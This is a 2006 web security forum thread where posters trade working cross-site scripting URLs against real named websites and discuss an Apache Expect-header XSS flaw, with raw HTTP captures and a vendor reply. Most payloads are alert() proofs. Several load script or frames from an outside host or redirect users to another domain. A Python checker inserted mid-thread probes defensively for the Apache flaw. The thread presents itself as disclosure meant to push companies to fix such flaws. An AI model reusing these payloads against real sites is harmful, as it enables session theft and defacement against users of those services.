Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails.
Current Page: 3 of 65
Re: So it begins
Posted by: Kyran
Date: September 21, 2006 12:30AM

It better not be your grandma. I remember rsnake 'hacked' into 127.0.0.1 earlier and found loads of grandma porn. He might try something sneaky.

- Kyran

Re: So it begins
Posted by: rsnake
Date: September 21, 2006 10:23AM

Dude, this guy I hacked at 127.0.0.1 is a freak... grandma porn, greasy midget porn... the works!

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: raif
Date: September 21, 2006 10:55AM

haha, no I'm not your grandma. This is what led me to those sites:

intext:"site search"

damn you google! *shaking fist*

Re: So it begins
Posted by: rsnake
Date: September 21, 2006 11:11AM

http://search.dangdang.com/dangdang.dll?key=%22%3E%3Cbody%20onload=alert(%22XSS%22)%3E&search_btn_top=%D4%DA%CB%F9%D3%D0%C9%CC%C6%B7%D6%D0%CB%D1&key1=&key2=&key3=&key4=&key5=&mode=&catalog=&sel1=1&sel2=1&sel3=1

Dang! Dangdang!

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 21, 2006 01:49PM

Looks like this particular thread has gotten some press guys:

http://www.darkreading.com/document.asp?doc_id=104313&f_src=darkreading_section_296

Keep up the good work. Sooner or later companies will start taking this seriously.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Kyran
Date: September 21, 2006 02:10PM

Great! Along with the ha.ckers post and the networkworld.com article, perhaps this will not just speed up the process but force companies to do something about it.

On a side note, another XSS...on the site talking about XSS!
[www.darkreading.com]

- Kyran

Re: So it begins
Posted by: WhiteAcid
Date: September 21, 2006 02:29PM

I love that you found that flaw on darkreading, I wonder if they'll actually re-read this thread and fix that.

After reading that my ego got a boost and a half :p

Anyway.... back to my web developing.

Edit: if you are planning to leave a comment in that article then... *cough*bugmenot.com*cough*

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 1 time(s). Last edit at 09/21/2006 02:32PM by WhiteAcid.

Re: So it begins
Posted by: rsnake
Date: September 21, 2006 03:01PM

Hahah! Be careful or people will stop linking to us! But if nothing else it proves the point - XSS really is everywhere.

Try this in Internet Explorer (mazda.com): http://ha.ckers.org/expect.swf?http://www.mazda.com/

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 21, 2006 03:07PM

http://nbc.resultspage.com/search?ts=custom&p=Q&uid=&w=%22%3E%3Cscript%3Ealert(1)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: WhiteAcid
Date: September 21, 2006 03:32PM

Hmmm... I'm vulnerable to expect thing too. I know I can set up a custom error page but is there anything else you can suggest? Keep in mind whiteacid.org is on shared hosting so I can't edit httpd.conf

I may have missed a blog post or something, but can you give me some info on this flaw?

Edit: I've decompiled and read the ActionScript, I've also sniffed the traffic while running the swf off my localhost, so I can see what it's doing, but why is it IE only? Why does only IE print that header onto the page?

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 1 time(s). Last edit at 09/21/2006 03:49PM by WhiteAcid.

Re: So it begins
Posted by: rsnake
Date: September 21, 2006 03:59PM

Here is the original post about this - it was an Amit Klein find (and the .swf file is his too - I just borrowed it): http://ha.ckers.org/blog/20060731/expect-header-injection-via-flash/

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: WhiteAcid
Date: September 21, 2006 04:34PM

Thanks

I just figured out why it doesn't work in Firefox. Here's the HTTP request created when I used IE:
GET / HTTP/1.1
Accept: */*
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Expect: <script>alert('http://www.whiteacid.org is vulnerable to the Expect Header vulnerability.');</script>
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
Host: www.whiteacid.org
Connection: Keep-Alive

Here's that same request using firefox:
GET / HTTP/1.1
Host: www.whiteacid.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://127.0.0.1/expect.swf?http://www.whiteacid.org
Cookie: [removed]

Firefox doesn't allow/support the request header. Now then... what are your suggestions on fixing this? Custom error page?
Edit: IE didn't post a referer but firefox did.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 1 time(s). Last edit at 09/21/2006 04:37PM by WhiteAcid.

Re: So it begins
Posted by: WhiteAcid
Date: September 21, 2006 05:11PM

I emailed Apache this:
Hey

It's possible to run JavaScript on an arbitrary server using the
Response header. This works only in IE (tested with IE and FF) as FF
doesn't support/allow the header. To be honest I don't know if this is
IE's fault or Apache's; while I'd naturally lean towards it being IE's fault,
I have this feeling that the Apache server is partly to blame too.
I've written about this here:
http://blogs.securiteam.com/index.php/archives/628

If you just want to test this yourself have a look here (in IE):
http://ha.ckers.org/expect.swf?http://www.mazda.com
http://ha.ckers.org/expect.swf?http://www.beyondsecurity.com

I'm not entirely sure how to fix this either, the only thing I can
come up with so far is creating a custom error page.

Thanks for your time.
Sid

The reply:
Hi Sid; This was previously reported in May, see
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3918

We fixed this by escaping the Expect error message in Apache HTTP Server
1.3.35, 2.0.58, and 2.2.2. I notice that this isn't mentioned on our
vulnerabilities page, which we'll correct tomorrow.

Thanks for contacting us.

Regards, Mark

Edit: oh and since the previous darkreading one was fixed, here's more:

http://www.darkreading.com/boards/message.asp?msg_id=138506<script>alert('xss')</script>
http://www.darkreading.com/boards/search.asp?search=<script>alert('xss')</script>&topic_id=30&thread_id=121715&filter=message_subject

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer



Edited 2 time(s). Last edit at 09/21/2006 05:27PM by WhiteAcid.

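The request captures and the Apache reply above pin the bug down: the Flash movie only makes IE send an arbitrary Expect header, and the XSS happens because Apache's 417 error page echoed that header back unescaped (CVE-2006-3918, fixed by escaping the message). As an added example, not code from the thread, from Amit Klein's swf, or from Apache, here is a small Python checker that sends the same kind of request with a harmless marker instead of a script tag and classifies a 417 response as reflected (vulnerable), escaped (the fix) or not echoed (for example a custom error page). The host name, the marker string, the probe() helper and the two sample responses are constructed for the demonstration; the sample error pages mimic Apache's wording but were not captured from a real server.

```python
"""Check whether a server echoes the Expect request header unescaped into
its 417 error page (the Apache bug discussed in the thread, CVE-2006-3918).

Added example; not code from the thread or from Apache. The marker, the
host names and the sample responses are constructed for the demonstration.
"""
import html
import re
import socket

# Harmless marker: it only matters if it comes back with the angle brackets
# intact, which is exactly what the vulnerable error page did.
MARKER = "<expectcheck>"


def build_request(host, path="/", header_value=MARKER):
    """Build the kind of request the Flash movie made IE send: a plain GET
    carrying an attacker-chosen Expect header."""
    lines = [
        "GET %s HTTP/1.1" % path,
        "Host: %s" % host,
        "User-Agent: expect-check/0.1",
        "Expect: %s" % header_value,
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("latin-1")


def split_response(raw):
    """Return (status code, decoded body) from a raw HTTP/1.x response."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0].decode("latin-1", "replace")
    m = re.match(r"HTTP/\d\.\d (\d{3})", status_line)
    if not m:
        raise ValueError("not an HTTP response: %r" % status_line)
    return int(m.group(1)), body.decode("latin-1", "replace")


def classify(raw, header_value=MARKER):
    """Classify a response to the probe:
    'reflected'  - header echoed with <> intact (vulnerable, CVE-2006-3918)
    'escaped'    - header echoed HTML-escaped (Apache's fix)
    'not_echoed' - header absent from the body (custom error page, etc.)
    'not_417'    - server did not answer 417 at all
    """
    status, body = split_response(raw)
    if status != 417:
        return "not_417"
    if header_value in body:
        return "reflected"
    if html.escape(header_value) in body:
        return "escaped"
    return "not_echoed"


def probe(host, port=80, timeout=5.0):
    """Send the probe over the network and classify the answer.
    (Network helper; the offline samples below do not use it.)"""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(host))
        chunks = []
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    return classify(b"".join(chunks))


# Constructed sample responses: an unpatched-style 417 page that reflects
# the header verbatim, and the same page with the value HTML-escaped.
VULNERABLE_417 = (
    b"HTTP/1.1 417 Expectation Failed\r\n"
    b"Content-Type: text/html; charset=iso-8859-1\r\n\r\n"
    b"<html><body><h1>Expectation Failed</h1>"
    b"<p>The expectation given in the Expect request-header field could not "
    b"be met by this server.</p><p>The client sent <pre>\n    Expect: "
    + MARKER.encode("latin-1") + b"\n</pre>\n</p></body></html>\n"
)
FIXED_417 = VULNERABLE_417.replace(
    MARKER.encode("latin-1"), html.escape(MARKER).encode("latin-1")
)

if __name__ == "__main__":
    print("vulnerable sample:", classify(VULNERABLE_417))
    print("fixed sample:     ", classify(FIXED_417))
```

Run it against a host with probe("www.example.org") (a constructed name here) to get the same verdicts live; a "not_echoed" result is what an ErrorDocument 417 override or an upgraded Apache should produce.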
Re: So it begins
Posted by: Kyran
Date: September 21, 2006 05:26PM

I just got home again and the darkreading hole was fixed, it seems.
Just more exposure for XSS, right? As the article said, it's lucky we aren't the bad guys.

As far as the EXPECT goes, I think for now the only real fix is a custom error page.

- Kyran

Re: So it begins
Posted by: WhiteAcid
Date: September 21, 2006 05:29PM

The post before yours has two more darkreading XSSes
If you can, upgrade Apache. I've emailed asking them what they suggest for work arounds if you can't upgrade (for instance if you're on a shared hosting).

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: rsnake
Date: September 21, 2006 06:05PM

Did you try an .htaccess file with something like:

ErrorDocument 417 http://www.whatever.com/

I haven't tried it, so your mileage may vary, and it depends on if the Apache install is set up to allow for .htaccess overrides.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 21, 2006 10:40PM

http://one.revver.com/browse/%3CBODY%20onload=alert(%22XSS%22)%3E

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: maluc
Date: September 21, 2006 10:54PM

Mac guys really annoy me. =___=
And for those that've heard about it since BlackHat, even now when they get their ass handed to them as Apple releases a patch for the supposedly 'fake vulnerability'... they're still complaining. Apparently, since he told them the vulnerability existed, and in which driver, but didn't tell them exactly where, now that Apple has located it, proving it exists, it doesn't count because Apple found it. I really don't understand their smug illogical religion.

/*end rant.*/

In Other News, http://www.macworld.com/search/index.php?as=1&st=1&rf=1&rq=0&col=mwmcc&oqsecrets=url%3Asecrets+&dt=ba&ady=21&amo=9&ayr=2005&bdy=21&bmo=9&byr=2006&qt=%3Ciframe+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html+%3C&nh=10&Search=Search+Again

-maluc

Re: So it begins
Posted by: rsnake
Date: September 21, 2006 10:57PM

Nice... got the iframe exploit in there, huh? Yah, I was never much of a Mac guy...

1) Amiga
2) OS2
3) NEXT
4) Mac

Can we see a trend here? ;)

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: rsnake
Date: September 21, 2006 11:07PM

This is why I should own hacker.com: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://hacker.com/enter.asp&hacker=www.hacker.com&name=&address=&city=&state=&postalcode=&country=&phone=&email=&offer=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&comments=&Submit=Submit

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: digi7al64
Date: September 21, 2006 11:16PM

http://www.weather.com/search/enhanced?where=<script>alert('quack')</script>

http://search2.foxnews.com/search?ie=UTF-8&oe=UTF-8&client=my_frontend&proxystylesheet=my_frontend&output=xml_no_dtd&site=default_collection&q=%22;alert('quack')//

thx to WhiteAcid for the help on the fox one.

http://www.independent.co.uk/search/simple.do?searchString=%3Cscript%3Ealert%28%27quack%27%29%3C%2Fscript%3E

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 2 time(s). Last edit at 09/21/2006 11:56PM by digi7al64.

Re: So it begins
Posted by: Kyran
Date: September 21, 2006 11:18PM

Weather that goes quack? Interesting...

- Kyran

Re: So it begins
Posted by: maluc
Date: September 21, 2006 11:19PM

Also, http://www.macworld.com/info/contact/form.php?e=///Not%20a%20Sploit%5C%22%20%3Cscript%3Ea=/XSS/;alert(a)%3C/script%3E

i really never gave email forms the attention they deserved in the past :/

Edit: note to self, make use of preview button before posting.

-maluc



Edited 1 time(s). Last edit at 09/21/2006 11:46PM by maluc.

Re: So it begins
Posted by: maluc
Date: September 21, 2006 11:45PM

Also, http://docs.info.apple.com/article.html?artnum=1233';alert('Shiver%20me%20Timbers.');document.location='http://%6D%61%63-%73%75%63%6B%73.com';a=%27

-maluc

Re: So it begins
Posted by: rsnake
Date: September 22, 2006 11:56AM

Are XSS threats overblown?
http://www.scmagazine.com/us/news/article/594339/xss-flaws-jump-top-cve-rankings-threat-overblown/

Funny you should mention it:
http://www.scmagazine.com/us/search/index.cfm?fuseaction=XCU.Search.Simple&sSearchPhrase=%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org/xss.js%20&sSection=ALL&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: WhiteAcid
Date: September 22, 2006 12:08PM

Quote

"XSS is now No.1. It literally took one year and probably less to reach No. 1," he said. "It actually pushed buffer overflow down to No. 4."
Well... that drop for overflows isn't all due to XSS; two other techniques must have helped.


Quote

[xss is] especially rampant because of the popularity of social networking sites.
No, it's rampant due to crappy coding.


The title is "...but is the threat overblown" but the article never mentions the threat being overblown (or the contrary). The only thing I saw was that the word overblown was also used in here:
Quote

The number of XSS flaws may be blown out of proportion
But that has nothing to do with the threat, that's the number of XSSes


Quote

"This is important to realize because XSS is now ranked by CVE as the most prevalent vulnerability, even more prevalent than buffer overflows," he said.
Yes, you already said that.

That "news" article severely needs re-writing.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: So it begins
Posted by: Kyran
Date: September 22, 2006 12:14PM

XSS in zdnet, also they are copypasta-ing the Mitre article there.
[www.zdnet.co.uk]




On another note, we made the news again.
http://www.scmagazine.com/uk/news/article/594339


EDIT - Ahaha. I had this window open for too long I suppose. Beat me to it.

- Kyran



Edited 1 time(s). Last edit at 09/22/2006 12:14PM by Kyran.

Re: So it begins
Posted by: maluc
Date: September 22, 2006 12:27PM

it's on scm's site, but a different domain hosting it:

http://www.careerbuilder.com/JobSeeker/Jobs/JobResults.aspx?S%3Asbkw=%22+style%3D-moz-binding%3Aurl%28http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%29+&S%3Asbcn=&S%3Asbsn=ALL&S%3Asbfr=30&S%3Asbsbmt=Search&cbsid=fa120e683b24470a9976bd14e5936ce9-212245906-WF-2&cid=US&lr=cbscmag&IPath=ILK&excrit=QID%3DA3849780031904%3Bst%3DA%3Buse%3DALL%3BrawWords%3D

firefox only, for autofun

-maluc

Re: So it begins
Posted by: maluc
Date: September 22, 2006 12:42PM

Ahh, this one's on their domain: http://www.scmagazine.com/us/awards/voting/index.cfm?fuseaction=XCU.Awards.Voting.Vote&nSubCatID=26140&uCategoryUuid=401b5be2-9cee-4298-9da4-0eaa4bf82348&uNomineeUuid=58f3627d-70e4-4bd7-bc30-ab660cdb17dd&sRandomString=66EDC001&checkCriteria_sName=You%20Are%20Voting%20On..%22%3E%3Cscript%3Ealert%28%22overblown%3F%21%22%29%3C%2Fscript%3E%3Cr%22&checkCriteria_sEmail=Best%20Web%20Filtering%20Solution&checkCriteria_bIsITProfessional=0&checkCriteria_bIsSubscriber=0&checkCriteria_bIsUSResident=0&checkCriteria_sCode=Ironic?&submit=submit

-maluc

Re: So it begins
Posted by: Kyran
Date: September 22, 2006 01:05PM

I've been thinking, unless you are doing something sarcastic/ironic like maluc, perhaps we should all use the ha.ckers.org/xss.js script to show that remote scripts could be executed. Otherwise it's just an alert.

- Kyran
